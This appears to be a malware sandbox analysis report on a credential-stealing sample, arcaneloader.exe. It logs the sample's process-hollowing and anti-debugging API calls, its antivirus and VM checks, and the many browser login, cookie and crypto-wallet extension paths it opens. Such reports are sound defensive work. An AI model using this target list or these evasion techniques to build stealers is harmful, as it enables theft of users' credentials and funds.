                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: arcaneloader.exe, 00000003.00000002.2349286243.000000000320A000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2347314866.000000000320A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW)b
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: arcaneloader.exe, 00000003.00000003.2218037186.00000000057F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: C:\Users\user\Desktop\arcaneloader.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_0043F4A0 LdrInitializeThunk,3_2_0043F4A0
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DC5444
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DDB18D mov edi, dword ptr fs:[00000030h]0_2_00DDB18D
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DBCD10 mov eax, dword ptr fs:[00000030h]0_2_00DBCD10
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DBBD50 mov edi, dword ptr fs:[00000030h]0_2_00DBBD50
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DBBD50 mov edi, dword ptr fs:[00000030h]3_2_00DBBD50
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DBCD10 mov eax, dword ptr fs:[00000030h]3_2_00DBCD10
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC9F90 GetProcessHeap,0_2_00DC9F90
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DC5444
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC5438 SetUnhandledExceptionFilter,0_2_00DC5438
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC7DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DC7DCA
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC4AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DC4AD9
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DC4AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00DC4AD9
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DC5444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00DC5444
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DC5438 SetUnhandledExceptionFilter,3_2_00DC5438
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 3_2_00DC7DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00DC7DCA

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DDB18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00DDB18D
                  Source: C:\Users\user\Desktop\arcaneloader.exeMemory written: C:\Users\user\Desktop\arcaneloader.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeProcess created: C:\Users\user\Desktop\arcaneloader.exe "C:\Users\user\Desktop\arcaneloader.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC5200 cpuid 0_2_00DC5200
                  Source: C:\Users\user\Desktop\arcaneloader.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeCode function: 0_2_00DC58C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00DC58C5
                  Source: C:\Users\user\Desktop\arcaneloader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: arcaneloader.exe, 00000003.00000003.2347546529.000000000325E000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000002.2349458499.0000000003260000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000002.2349286243.000000000320A000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2291391103.000000000326F000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2347314866.000000000320A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\arcaneloader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: arcaneloader.exe PID: 280, type: MEMORYSTR
                  Source: Yara matchFile source: 3.2.arcaneloader.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.arcaneloader.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2147698291.000000000349E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: arcaneloader.exe, 00000003.00000003.2347546529.000000000325E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets$
                  Source: arcaneloader.exe, 00000003.00000003.2265617650.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                  Source: arcaneloader.exe, 00000003.00000003.2347546529.000000000325E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletY
                  Source: arcaneloader.exe, 00000003.00000003.2265858312.000000000328C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                  Source: arcaneloader.exe, 00000003.00000003.2265617650.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: arcaneloader.exe, 00000003.00000003.2265858312.000000000328C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
